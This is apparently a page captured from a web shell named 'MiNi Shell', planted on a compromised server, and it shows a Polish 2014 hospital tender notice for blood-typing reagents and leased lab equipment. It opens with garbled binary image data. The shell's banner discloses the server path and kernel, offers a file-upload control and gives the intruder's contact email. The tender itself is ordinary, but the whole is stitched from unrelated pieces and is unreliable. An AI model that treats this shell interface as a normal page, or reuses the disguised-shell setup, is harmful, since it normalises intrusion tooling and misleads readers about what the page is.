JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140227/41177-N-2014.html

<p class="kh_header"><b>Bielsko - Biała: Dostawa odczynników, krwinek wzorcowych oraz materiałów zużywalnych    wraz z dzierżawą aparatury do oznaczeń w immunohematologii metodą aglutynacji kolumnowej, żelowej  dla potrzeb Beskidzkiego Centrum Onkologii - Szpitala Miejskiego im. Jana Pawła II w Bielsku-Białej</b><br>
<b>Numer ogłoszenia: 41177 - 2014; data zamieszczenia: 27.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Beskidzkie Centrum Onkologii - Szpital Miejski  im. Jana Pawła II w Bielsku-Białej , ul. Wyzwolenia 18, 43-300 Bielsko - Biała, woj. śląskie, tel. 33 816 43 70, faks 33 816 44 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.onkologia.bielsko.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników, krwinek wzorcowych oraz materiałów zużywalnych    wraz z dzierżawą aparatury do oznaczeń w immunohematologii metodą aglutynacji kolumnowej, żelowej  dla potrzeb Beskidzkiego Centrum Onkologii - Szpitala Miejskiego im. Jana Pawła II w Bielsku-Białej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników, krwinek wzorcowych oraz materiałów zużywalnych wraz dzierżawą aparatury do oznaczeń w immunohematologii metodą aglutynacji kolumnowej, żelowej  przez okres 36 miesięcy od daty podpisania umowy do Laboratoriów Analitycznych Beskidzkiego Centrum Onkologii - Szpitala Miejskiego im. Jana Pawła II w Bielsku - Białej w lokalizacji przy ul. Wyzwolenia 18 i ul. Wyspiańskiego 21, z tym że przy ul. Wyzwolenia 18 zamówienie będzie realizowane od dnia 25.07.2014r. W skład dzierżawy wchodzi następująca aparatura: 
dotyczy  Laboratorium Analitycznego mieszczącego się przy ul. Wyspiańskiego 21: wirówka o pojemności 6-12 mikrokart - 2 szt, pipeta automatyczna dostosowana do metody - 2 szt. wirówka z wirnikiem horyzontalnym - 1 szt., oprogramowanie do zarządzania pracownią serologii i bankiem krwi wraz z zestawem komputerowym i niezbędnym osprzętem - drukarka laserowa i programowalny czytnik kodów kreskowych, 1 licencja (zawierająca bank krwi i pracownię serologii), czytnik na pojedynczą mikrokartę dedykowany do metody - z zestawem komputerowym i oprogramowaniem z menu w języku polskim -  1 szt., dozownik do diluentu - 1 szt.
dotyczy Laboratorium Analitycznego mieszczącego się przy ul. Wyzwolenia 18:
wirówka o pojemności 6-12 mikrokart - 2 szt. pipeta automatyczna dostosowana do metody - 2 szt., inkubator do mikrokart - 2 szt. czytnik na pojedynczą mikrokartę dedykowany do metody - z zestawem komputerowym i oprogramowaniem z menu w języku polskim - 1 szt., dozownik do diluentu - 1 szt.
Asortyment i ilość odczynników i materiałów zużywalnych określa załącznik nr 5 do siwz a parametry  graniczne odczynników i dzierżawionej aparatury  określa szczegółowo  załącznik nr 6 do siwz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.61.00-6, 33.69.62.00-7, 42.93.11.00-2, 38.43.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia:
a) stosownego oświadczenia z art. 22 ust. 1  ustawy Prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia:
a)	  stosownego oświadczenia z art. 22 ust. 1  ustawy Prawo zamówień publicznych o spełnieniu   warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do siwz.
Na potwierdzenie warunku Zamawiający wymaga złożenia:
b)	wykazu wykonanych   lub wykonywanych głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie - do każdego wykazanego zamówienia powinny być załączone dowody potwierdzające, że dostawy te zostały wykonane lub są wykonywane należycie. 
Dowodami potwierdzającymi należyte wykonanie zamówienia są:
- w przypadku, gdy podmiotem na rzecz, którego wykonane były  lub są wykonywane zamówienia wskazane w wykazie nie był Zamawiający poświadczenie wydane  przez ten podmiot ( w odniesieniu do nadal wykonywanych dostaw wykazanych w wykazie poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert), a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia oświadczenie  wykonawcy,
- w przypadku gdy podmiotem na rzecz którego były wcześniej wykonane zamówienia wskazane w wykazie był Zamawiający wykonawca nie ma obowiązku przedkładania poświadczenia.
Dla Zamawiającego warunkiem wystarczającym będzie wykazanie wykonania lub wykonywania w w/w okresie co najmniej 2 zamówień   polegających na dostawie odczynników wraz z dzierżawą aparatury do oznaczeń w immunohematologii metodą aglutynacji kolumnowej, żelowej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia:
a)stosownego oświadczenia z art. 22 ust. 1  ustawy Prawo zamówień  publicznych o spełnieniu  warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia:
a) stosownego oświadczenia z art. 22 ust. 1  ustawy Prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia:
a) stosownego oświadczenia z art. 22 ust. 1  ustawy Prawo zamówień publicznych o spełnieniu  warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych   lub wykonywanych głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie - do każdego wykazanego zamówienia powinny być załączone dowody potwierdzające, że dostawy te zostały wykonane lub są wykonywane należycie. 
Dowodami potwierdzającymi należyte wykonanie zamówienia są:
- w przypadku, gdy podmiotem na rzecz, którego wykonane były  lub są wykonywane zamówienia wskazane w wykazie nie był Zamawiający poświadczenie wydane  przez ten podmiot ( w odniesieniu do nadal wykonywanych dostaw wykazanych w wykazie poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert), a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia oświadczenie  wykonawcy,
- w przypadku gdy podmiotem na rzecz którego były wcześniej wykonane zamówienia wskazane w 
  wykazie był Zamawiający wykonawca nie ma obowiązku przedkładania poświadczenia.
Dla Zamawiającego warunkiem wystarczającym będzie wykazanie wykonania lub wykonywania w w/w okresie co najmniej 2 zamówień   polegających na dostawie odczynników wraz z dzierżawą aparatury do oznaczeń w immunohematologii metodą aglutynacji kolumnowej, żelowej.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Wypełniony formularz ofertowy - wg wzoru stanowiącego załącznik nr 1 do siwz;
2.Wypełniony formularz asortymentowo-cenowy wg wzoru stanowiącego załącznik nr 5 do siwz;
3.Wypełniony formularz szczegółowego opisu przedmiotu zamówienia wg wzoru stanowiącego załącznik nr 6  do siwz 
4. Oświadczenie  potwierdzające,  że oferowana aparatura spełnia wymagania ustawy z dnia 20.05.2010r.  o wyrobach medycznych (Dz.U. z 2010r. Nr 107, poz. 679)  oraz że  jest oznakowana znakiem CE i posiada ważną deklarację zgodności CE wraz z kopią deklaracji zgodności CE w załączeniu.
5. Oświadczenie potwierdzające,  że wszystkie oferowane wyroby będące wyrobami medycznymi spełniają Rozporządzenie Ministra Zdrowia z dnia 12 stycznia 2011r. w  sprawie wymagań zasadniczych oraz procedur oceny zgodności wyrobów medycznych, oraz że są  oznakowane znakiem CE i  posiadają ważną deklarację zgodności CE.
6. Oświadczenie potwierdzające,  że wszystkie oferowane wyroby będące wyrobami medycznymi do diagnostyki In vitro spełniają Rozporządzenie Ministra Zdrowia z dnia 12 stycznia 2011r. w  sprawie wymagań zasadniczych oraz procedur oceny zgodności wyrobów medycznych do diagnostyki In vitro, oraz że są  oznakowane znakiem CE i  posiadają ważną deklarację zgodności CE.
7. Oświadczenie potwierdzające, że wszystkie oferowane wyroby będące produktami biobójczymi w rozumieniu ustawy z dnia 13 września 2002r. o produktach biobójczych (tekst jednolity z 2007r. nr 39 poz. 252 z późn. zm. ) posiadają pozwolenie na wprowadzenie  do obrotu lub pozwolenie tymczasowe lub posiadają decyzję o wpisie do rejestru produktów biobójczych  niskiego ryzyka lub posiadają  pozwolenie na obrót o którym mowa w art. 54 w/w ustawy
8. Oświadczenia potwierdzające, że wszystkie oferowane odczynniki będące substancjami chemicznymi lub ich mieszaninami  w rozumieniu ustawy z dnia 25 lutego 2011r. o substancjach chemicznych i ich mieszaninach (Dz.U. Nr 63 poz. 322 z 2011r. z późn. zm.) posiadają karty charakterystyki substancji chemicznej lub jej mieszaniny;
9. Oświadczenie potwierdzające,  że oferowana metoda aglutynacji kolumnowej, żelowej (odczynniki  oraz krwinki wzorcowe) jest zgodna z obowiązującymi w serologii zaleceniami IHiT.
10. Pozytywna opinia  IHiT lub innej instytucji  odpowiedzialnej  za Polską Służbę Krwi dla oferowanej  metody aglutynacji kolumnowo, żelowej (dla odczynników oraz krwinek wzorcowych).
11. Instrukcje użytkowania wszystkich oferowanych odczynników i krwinek wzorcowych.
12. Dokument potwierdzający posiadanie uprawnień przez Wykonawcę lub autoryzowany serwis do wykonywania czynności serwisowych przez cały okres realizacji zamówienia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwa do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - udzielone osobom nie wymienionym w dokumencie, o którym mowa w sekcji III.4.2) dokumentów składających się na ofertę oraz innych składanych w toku postępowania;
2. Informacja  potwierdzająca, że istniejące, wykazane przez Wykonawców należących do tej samej grupy  kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy powiązania, nie prowadzą do zachwiania uczciwej konkurencji pomiędzy Wykonawcami biorącymi udział w postępowaniu.
3. Pisemne zobowiązanie innych podmiotów zgodnie z art. 26 ust. 2 b) ustawy do oddania do dyspozycji  Wykonawcy niezbędnych zasobów (wiedza, doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia oraz zdolności finansowe) na okres korzystania z nich przy wykonywaniu zamówienia - dotyczy Wykonawców, którzy polegają na wiedzy, doświadczeniu, potencjale  technicznym i osobach  zdolnych  do wykonania zamówienia oraz zdolnościach finansowych innych podmiotów.
4.W przypadku gdy Wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów  na zasadach określonych w art. 26 ust. 2b) ustawy, Zamawiający w  celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla  należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów,  żąda dokumentów dotyczących w szczególności: 
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu przez wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia
5. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w sekcji III.3.1) - III.3.5) oraz w sekcji III.4.1) winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w sekcji III.4.2) - III.4.3) oraz w sekcji III.4.4)  powinien spełniać każdy z Wykonawców samodzielnie.
W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego dokumenty i oświadczenia, o których mowa w sekcji III.5) składa co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie, natomiast informacje o których mowa w sekcji III.6) pkt 2 składa każdy z Wykonawców samodzielnie. Ocena spełnienia określonych wyżej warunków zostanie dokonana na podstawie złożonych przez 
Wykonawcę dokumentów, w tym oświadczeń określonych w treści siwz. Zamawiający sprawdzi kompletność oświadczeń i dokumentów, a następnie dokona sprawdzenia spełnienia warunków wg zasady spełnia (+) / niespełnia (-), co musi wynikać jednoznacznie z treści tych oświadczeń i dokumentów. Wykonawca, który nie spełni   warunków uprawniających do udziału w postępowaniu, o których mowa w sekcji III.3.1) - sekcji III.3.5), w sekcji III.4) oraz w sekcji III.6) pkt 2 zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą,  natomiast   oferta  Wykonawcy,  który  nie spełni warunków, o których mowa w sekcji III.5)  zostanie odrzucona</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>szczegółowo opisuje załącznik nr 4 do siwz - projekt umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.onkologia.bielsko.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 43-300 Bielsko - Biała ul. Wyzwolenia 18, budynek Dyrekcji - Dział Zamówień Publicznych pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2014 godzina 10:00, miejsce: 43-300 Bielsko - Biała ul. Wyzwolenia 18, budynek Dyrekcji - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com